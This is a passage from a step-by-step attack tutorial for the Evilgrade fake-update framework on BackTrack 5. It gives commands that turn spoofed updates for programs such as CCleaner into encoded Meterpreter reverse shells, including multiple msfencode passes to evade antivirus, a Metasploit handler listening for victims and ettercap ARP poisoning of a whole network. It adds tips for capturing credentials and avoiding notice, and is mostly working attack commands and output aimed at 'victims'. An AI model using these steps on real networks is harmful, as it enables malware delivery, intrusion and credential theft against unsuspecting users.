(just click on download link in bottom right). This tutorial will be done almost entirely from the command prompt, so please dont ask why you couldn't double click point and shoot to make it work. I will classify this one as Intermediate in nature as it is all from command line and requires some initial steps to get it working. If you are at all familiar with working on Cisco Routers or other IOS type CLI environments then this will be a piece of cake. Let's begin, try to keep up...
You will need to start by extracting Evilgrade once it has been downloaded from the homepage, for this you can use the following commands:
Commands: tar -zxvf
root@bt:~/Desktop/EvilGrade2.0# tar -zxvf isr-evilgrade-2.0.0.tar.gz
NOTE: you can add the -C argument followed by the path if you want to extract it
to another location other than where it is sitting after it was downloaded
EX: root@bt:~/Desktop/EvilGrade2.0# tar -zxvf isr-evilgrade-2.0.0.tar.gz
-C /pentest/exploits/ISR
Now you will have a new folder called "isr-evilgrade" either in the default location on your desktop or where you told it to go with the -C argument noted above. Navigate to this folder and you can start it up...maybe. By default Backtrack does not have all of the underlying Perl modules needed for the framework to work, so we will need to make some quick additions to instlal those dependencies, as follows:
You can try to start Evilgrade to check byu simply entering the following at commadn prompt and hitting enter: ./evilgrade
If you are using a fresh BT 5 install then you will get the following results:
root@bt:~/Desktop/EvilGrade2.0/isr-evilgrade# ./evilgrade
Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.
BEGIN failed--compilation aborted at isrcore/Shell.pm line 28.
Compilation failed in require at (eval 2) line 3.
...propagated at /usr/share/perl/5.10/base.pm line 93.
BEGIN failed--compilation aborted at isrcore/shellz.pm line 29.
Compilation failed in require at ./evilgrade line 24.
BEGIN failed--compilation aborted at ./evilgrade line 24.
Take note of the dependency missing above (Data/Dump.pm). EvilGrade requires the following perl modules to work 100%: Data::Dump, Digest::MD5, and Time::HiRes
For BackTrack5 we will need to install Data::Dump, and to do this you
can use the following commands:
Command to search for package: apt-cache search perl <insert package name looking for>
EX: apt-cache search perl Data::Dump
NOTE: the package name usually starts with lib and ends with -perl, like:
libsomething-perl, and results should provide basic description as well
What we need: libdata-dump-perl - Perl module to help dump data structures
Command to Install the package (using name found above): apt-get install <package name>
EX: ap-get install libdata-dump-perl
Once this is installed you should be able to re-check to see if anything else is needed (nothing else is needed for BT5, but if you are using BT4 you might also have to install one of the other two dependecies listed above). We can re-check by simply typing the following:
Command: ./evilgrade
Results this time around:
root@bt:~/Desktop/EvilGrade2.0/isr-evilgrade# ./evilgrade
[DEBUG] - Loading module: modules/cygwin.pm
[DEBUG] - Loading module: modules/virtualbox.pm
[DEBUG] - Loading module: modules/sparkle.pm
[DEBUG] - Loading module: modules/clamwin.pm
[DEBUG] - Loading module: modules/ccleaner.pm
[DEBUG] - Loading module: modules/miranda.pm
[DEBUG] - Loading module: modules/notepadplus.pm
[DEBUG] - Loading module: modules/amsn.pm
[DEBUG] - Loading module: modules/winzip.pm
[DEBUG] - Loading module: modules/istat.pm
[DEBUG] - Loading module: modules/linkedin.pm
[DEBUG] - Loading module: modules/flip4mac.pm
[DEBUG] - Loading module: modules/photoscape.pm
[DEBUG] - Loading module: modules/jet.pm
[DEBUG] - Loading module: modules/getjar.pm
[DEBUG] - Loading module: modules/superantispyware.pm
[DEBUG] - Loading module: modules/dap.pm
[DEBUG] - Loading module: modules/filezilla.pm
[DEBUG] - Loading module: modules/allmynotes.pm
[DEBUG] - Loading module: modules/panda_antirootkit.pm
[DEBUG] - Loading module: modules/sunjava.pm
[DEBUG] - Loading module: modules/cpan.pm
[DEBUG] - Loading module: modules/freerip.pm
[DEBUG] - Loading module: modules/autoit3.pm
[DEBUG] - Loading module: modules/apt.pm
[DEBUG] - Loading module: modules/googleanalytics.pm
[DEBUG] - Loading module: modules/opera.pm
[DEBUG] - Loading module: modules/gom.pm
[DEBUG] - Loading module: modules/techtracker.pm
[DEBUG] - Loading module: modules/yahoomsn.pm
[DEBUG] - Loading module: modules/nokia.pm
[DEBUG] - Loading module: modules/appleupdate.pm
[DEBUG] - Loading module: modules/growl.pm
[DEBUG] - Loading module: modules/bbappworld.pm
[DEBUG] - Loading module: modules/atube.pm
[DEBUG] - Loading module: modules/nokiasoftware.pm
[DEBUG] - Loading module: modules/skype.pm
[DEBUG] - Loading module: modules/apptapp.pm
[DEBUG] - Loading module: modules/vidbox.pm
[DEBUG] - Loading module: modules/isopen.pm
[DEBUG] - Loading module: modules/winupdate.pm
[DEBUG] - Loading module: modules/jetphoto.pm
[DEBUG] - Loading module: modules/trillian.pm
[DEBUG] - Loading module: modules/openoffice.pm
[DEBUG] - Loading module: modules/mirc.pm
[DEBUG] - Loading module: modules/ubertwitter.pm
[DEBUG] - Loading module: modules/orbit.pm
[DEBUG] - Loading module: modules/osx.pm
[DEBUG] - Loading module: modules/bsplayer.pm
[DEBUG] - Loading module: modules/sunbelt.pm
[DEBUG] - Loading module: modules/quicktime.pm
[DEBUG] - Loading module: modules/flashget.pm
[DEBUG] - Loading module: modules/fcleaner.pm
[DEBUG] - Loading module: modules/express_talk.pm
[DEBUG] - Loading module: modules/divxsuite.pm
[DEBUG] - Loading module: modules/speedbit.pm
[DEBUG] - Loading module: modules/paintnet.pm
[DEBUG] - Loading module: modules/itunes.pm
[DEBUG] - Loading module: modules/teamviewer.pm
[DEBUG] - Loading module: modules/winscp.pm
[DEBUG] - Loading module: modules/vmware.pm
[DEBUG] - Loading module: modules/blackberry.pm
[DEBUG] - Loading module: modules/winamp.pm
_ _ _
(_) | _ | |
_____ | ___| | __ _ _ _| | ___
/ _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \
| __/\ V /| | | (_| | | | (_| | (_| | |__/
\___| \_/ |_|_|\__, |_| \__,_|\_,_|\___|
__ / |
|___/
-------------------------------------------
--------------------- http://www.infobytesec.com/
- 63 modules available.
evilgrade>....
Now that we have it running what next you might be asking? Let's start by seeing what all is available when we begin, start by simply typing in "help"...
Results...
evilgrade>help
Type 'help command' for more detailed help on a command.
Commands:
configure - Configure <module-name> - no help available
exit - exits the program
help - prints this screen, or help on 'command'
reload - Reload to update all the modules - no help available
restart - Restart webserver - no help available
set - Configure variables - no help available
show - Display information of <object>.
start - Start webserver - no help available
status - Get webserver status - no help available
stop - Stop webserver - no help available
version - Display framework version. - no help available
vhosts - Show vhosts enable - no help available
We can check what modules are available to see what types of SW we can target by using the "show modules" command from the evilgrade command prompt.
Results...from: evilgrade>show modules
List of modules:
===============
allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 63 modules available.
As you can see there are a lot of modules available and I assure you that you can find many of these on almost any PC (lots of times more than one). Now you will need to identify which one you want to work with. Most of the demos provided by the creators of this cool tool show the "sunjava" module being used, so I thought I would use something different, you can use what you want or what you know your target will have running. Once you have made up your mind about which module(s) we will use it is time to start setting things up. We will begin by letting Evilgrade know which module we want to use, like so:
Command: evilgrade>configure <insert module name you chose>
EX: evilgrade>configure ccleaner
You will know you are in the chosen modules configuration mode, which is noticable as the command prompt will change and now appear as follows:
Results...from above: evilgrade>configure ccleaner...
evilgrade(ccleaner)>
OK so now to check what all is configurable for a chosen module. We can do this by simpy typing "show options" at the configuration level command prompt.
Results...
evilgrade(ccleaner)>show options
Display options:
===============
Name = Ccleaner
Version = 1.0
Author = ["German Rodriguez < grodriguez +[AT]+ infobytesec.com >"]
Description = ""
VirtualHost = "http://www.ccleaner.com/"
.---------------------------------------------------.
| Name | Default | Description |
+--------+---------------------+-----------------+
| enable | 1 | Status |
| agent | ./agent/agent.exe | Agent to inject |
'---------+---------------------+-------------------'
You can see that "VirtualHost" is set to http://www.ccleaner.com/, this is the virtual host the Evilgrade will impersonate once we get things running and start our MiTM attack. If you notice these have changed over time or you know of "secret" update servers you can simply edit this field to change.
PRO-TIP: You can edit the perl modules in the "modules" folder within
isr-evilgrade folder if you know what you are doing to edit the VirtualHost settings,
but if you are not familiar with Perl then I dont suggest messing with these
and simply leaving as default will do for most scenarios. These can also be
studied to add in your own modules for other applications and some basic
instructions can be found within the tools documentation and README file.
The AGENT field is the MOST IMPORTANT field we will be working ith for this tutorial as it will be our evil agent in disguise, it is the fake update binary. We have two options for setting up our agent in disguise:
- OPTION 1: We can set up Evilgrade to work with Metasploit and msfpayload/msfencode to dynamically create payloads on the fly
- OPTION 2: We can use our own RAT or backdoor to be uploaded to our victims.
We can accomplish either scenario using the "set" command and defining the AGENT field, by providing a path to Metasploit's msfpayload and msfencode OR by providing path directly to your RAT or backdoor.
Here is overview of both methods with examples so you can more clearly understand:
OPTION 1: let Metasploit helpout and generate payload on the fly Command: evilgrade(ccleaner)>set agent '["/usr/local/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 X > <%OUT%>/tmp/agent.exe<%OUT%>"]'
NOTE: If you are not using BT5 just make sure the first part
(/usr/local/bin/msfpayload) points to where the path variable is located so
the framework can use it, as it BT4 it is located at /usr/bin/msfpayload.
PRO-TIP: You can replace the above example using meterpreter reverse shell
with your choice of the available payloads in Metasploit (of which there are many)
SUPER-PRO-TIP: If you want to avoid anti-virus from catching your agent due to Meterpreter being blasted all of the place, you can modify the above command to also encode the agent so it has a better chance of passing AV. Here is an example you can work with, note that msfencode only encodes RAW data so it needs to be RAW and then converted to binary EXE format to work (also why you cant just encrypt your standard RAT with msfencode)
EX: evilgrade(ccleaner)>set agent '["/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > <%OUT%>/tmp/agent.exe<%OUT%>"]'
In this case for every required update binary or victim request we get, the framework will generate a fake update binary using our dynamic link to MSF which will load a encoded Meterpreter reverse shell.
OPTION 2: Using our own RAT or backdoor with hard coded path to EXE. You will simply need to place your RAT or backdoor of choice in a designated folder and then tell the framework where to find it, it is as simply as this:
Command: evilgrade(ccleaner)>set agent /root/Desktop/server.exe
NOTE: msfecode will not be able to help you FUD your payload if it
is already in Binary EXE form, so make sure it is FUD to avoid any issues
with AVs ahead of time
In this case for every required update binary or victim request we get, the framework will simpoly use your designated RAT/Backdoor to create the update agent
IMPORTANT NOTES: You will need to setup the "exploit/multi/handler" from within MSF console to monitor connections made from our Meterpreter Shell (if you are using your own RAT or Backdoor I will assume you know how to monitor for connections and successful uploads).
From MSF Console, type the following commands:
use exploit/multi/handler
set payload=windows/metepreter/reverse_tcp
set LHOST=192.168.1.2
set LPORT=31337
Exploit
Results...
[*] Started reverse handler on 192.168.1.2:31337
[*] Starting the payload handler...
When we are done making our configuration changes we will simply enter the "conf" command to get out of configuration mode and back to initial command prompt, or as the authors call it Global Conifuration Mode. You can repeat the above steps for other modules to have more than one setup at once. We will also want to issue the "reload" command so that the framework will update all of the modules to include the updates we made above at the configuration level (for the module ccleaner in this example). Once that is done you can issue the "show active" commands to show the active modules you have configured.
Commands:
evilgrade(ccleaner)>conf
evilgrade>
evilgrade>reload
OK so we have configured our modules to reference the appropriate AGENT we want to use, now it is time to place the final edits and start things up...
From the Global Configuration Mode you will need to enter "show options" to see how Evilgrade is setup to act as DNS and Webserver as well as what ports it is working on.
Command: evilgrade>show options
Results...
Display options:
===============
.-------------------------------------------------------------------------------------------------------.
| Name | Default | Description |
+------------------+-----------+---------------------------------------------------------------------+
| DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) |
| DNSPort | 53 | Listen Name Server port |
| debug | 1 | Debug mode |
| port | 80 | Webserver listening port |
| sslport | 443 | Webserver SSL listening port |
'-------------------+-----------+---------------------------------------------------------------------'
As you can see we need to change a few things. We will need to change the "DNSAnswerIp" to point at our IP on the network, in this example 192.168.1.2.
Command: evilgrade> set DNSAnswerIp 192.168.1.2
Confirm with: evilgrade>show options
Result:
Display options:
===============
.----------------------------------------------------------------------------------------------------------.
| Name | Default | Description |
+------------------+--------------+---------------------------------------------------------------------+
| DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 192.168.1.2 | Resolve VHost to ip ) |
| DNSPort | 53 | Listen Name Server port |
| debug | 1 | Debug mode |
| port | 80 | Webserver listening port |
| sslport | 443 | Webserver SSL listening port |
'-------------------+--------------+---------------------------------------------------------------------'
Starting, stopping and checking the status of Evilgrade is equally as easy. You simply issue "start", "stop", or ":restart" to do the obvious, and you can check the status of things by issuing the "status" command.
NOTE: the "status" command will get information regarding the webserver
and DNS server status (running or not) as well as any victim details)
Command: evilgrade>start
evilgrade>start
...
evilgrade>
[18/5/2011:15:34:4] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[18/5/2011:15:34:4] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
evilgrade>show status
Webserver (pid 666) already running
Users status:
============
.------------------------------------------------------------------------------------------------------------.
| Client | Module | Status | Md5,Cmd,File |
+----------- ----+----------------------+---------+------------------------------------------------------+
| 192.168.1.25 | modules::ccleaner | send | MD5-Hash-Value,'',"./agent/agent.exe" |
'------------------+-----------------------+--------+-------------------------------------------------------'
evilgrade>stop
Stopping WEBSERVER [OK]
Stopping DNSSERVER [OK]
OK so that is all there is to setting up Evilgrade! From here you just need to pull off a Man-in-the-Middle (MiTM) attack so you can start redirecting DNS traffic and then restart Evilgrade so it can work its magic. I suggest leaving Evilgrade running in one terminal window and opening another window up to pull off the MiTM attack. The MiTM attack has been well documented using all sorts of tools. Please read up on the various methods that can be used for this portion of the tutorial as there are many ways to go about doing this, but I will cover one basic example using Ettercap to redirect traffic on a specific target so you can complete our testing of this method without leaving you hanging.
Getting MiTM attack working so Evilgrade can do its thing - MiniTutorial:Open new terminal in BackTrack5 and type the following:
Command: ifconfig
Take note of your IP address, default gateway and interface name
Command: nmap -sP 10.10.10.*
This will perform a quick pin sweep of the network, you can change
the 10.10.10.* to fit your need based on ifconfig results above (i.e. 192.168.1.*)
Command: echo 1 > /proc/sys/net/ipv4/ip_forward
This ensures packet forwarding is turned on
Confirm: cat /proc/sys/net/ipv4/ip_forward
Result: should return a one (1) to indicate port forwarding is enabled
Command: ettercap -T -Q -M ARP -i eth0 /victim-ip/ /gateway-ip/ -l capturefile -P autoadd
-T starts ettercap in text mode
NOTE: You could envoke ettercap with the -G argument only, to open the GTK GUI
for ettercap and then pick and choose the plugins to use from the GUI (noobs)
-Q will make ettercap run in Quiet mode, and not print raw packets in the terminal window
NOTE: if you want to see everything or to look cool just omit this flag
-M starts MiTM attack mode
NOTE: You can combine all of the above into one argument to simplify
things '-TQM' or separated individually
ARP is the type of poisoning we want to perform while in MiTM mode
-l capturefile tells ettercap to log captured data into file called "capturefile"
NOTE: you can cahnge the capture file name to anything you want
PRO-TIP: you can add more code to have this filtered on the fly for logins
and credentials with minimal effort or you can sort through it offline later
with Wireshark or your capture analysis tool of choice. It is also possible
to add SSLstrip to the equation but you will need to figure that out as I
dont have time to cover that here...
-P autoadd - is a way to tell ettercap to use the plugin autoadd, which as it sounds is a plugin that automaticlly adds hosts to the list after it is started in case any come online after it is initially started
NOTE: you can add other plugins here or leave out entirely, it is up to you
-i eth0 specifies the network interface
/victim-ip/ is the ip address we want to affect, or in this case arp poison
NOTE: you can leave simply as "//" to indicate you want to perform the task
on the ENTIRE network
/gateway-ip/ is the ip address we want to use to essentially impersonate
NOTE: this does not have to be the gateway, but in most cases this will have the best results.
EX: ettercap -TQM ARP // // -P autoadd
This ARP poisins the whole network, adding any new hosts that show up late to our party ;)
If you fill in the /"victim-ip"/ and /"gateway-ip"/ and run this command it will start ARP poisoning all hosts on the network that you have identified. Once this is done Evilgrade will sart picking up the traffic and begin forging secret agents to pawn your victims. At this point just sit back and watch the sessions stack up in your multi-handler terminal (or wherever you view your connections for your RAT/Backdoor). You should remember to use the proper method to close ettercap so it properly restores the routing tables on the victims when you are done (just hit "q" in terminal screen while it is running and give it a second to shutdown)...you dont have to but it will go less noticed if you do.
Personal Note: I find it's also nice to save the iptables for future use. I suggest saving them before and reloading them once you are done and have ended all the stuff you have running;
Command: iptables-save <filename>
Command: echo 0 > /proc/sys/net/ipv4/ip_forward
Confirm: cat /proc/sys/net/ipv4/ip_forward
Result: should return a zero (0) to indicate port forwarding is turned off
PRO_TIP: If you simply want to permanently set this to forward, you can
edit the /etc/sysctl.conf file to uncomment the forwarding line
Command: iptables-restore <filename>
General Note: If you are performing this or any of the other steps in this tutorial on another Linux distro you may have to run "sudo" in front of all the commands to work, not in issue in Backtrack as you run as root by default. You can download ettercap using apt-get (apt-get install ettercap) if you need that as well.
I hope you have enjoyed this tutorial as I know I had fun documenting things to share with you, and remember to always be aware of your surroundings before you start clicking away and allowing things to do what they please. Do not put all your faith in a company name, and take off your auto-updaters or dont allow them to update unless you are on a secure network that you know is safe. Enjoy and stay tuned for more to come when I return in a few weeks....
Later,
H.R.